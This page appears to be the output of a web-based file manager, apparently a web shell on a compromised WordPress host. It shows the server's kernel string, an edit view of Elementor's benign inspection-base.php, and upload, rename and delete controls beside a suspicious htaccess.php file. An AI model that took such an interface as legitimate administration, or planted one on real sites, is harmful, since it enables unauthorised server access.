File ManagerCurrent Directory: wp-content/plugins/elementor/core/debug/classesLinux appserver-7a7af3b2-php-0c9ec09e2f9746c2a80fa3756c076432 6.12.94+ #1 SMP Fri Jul 17 09:26:56 UTC 2026 x86_64Edit File: inspection-base.php <?php namespace Elementor\Core\Debug\Classes; abstract class Inspection_Base { /** * @return bool */ abstract public function run(); /** * @return string */ abstract public function get_name(); /** * @return string */ abstract public function get_message(); /** * @return string */ public function get_header_message() { return esc_html__( 'The preview could not be loaded', 'elementor' ); } /** * @return string */ abstract public function get_help_doc_url(); } Upload File Directory Listing NameTypeSizeActions.. (Parent Directory)Dirhtaccess.phpFile1.26 KB Rename | Delete | Editinspection-base.phpFile502.00 B Rename | Delete | Edittheme-missing.phpFile645.00 B Rename | Delete | Edit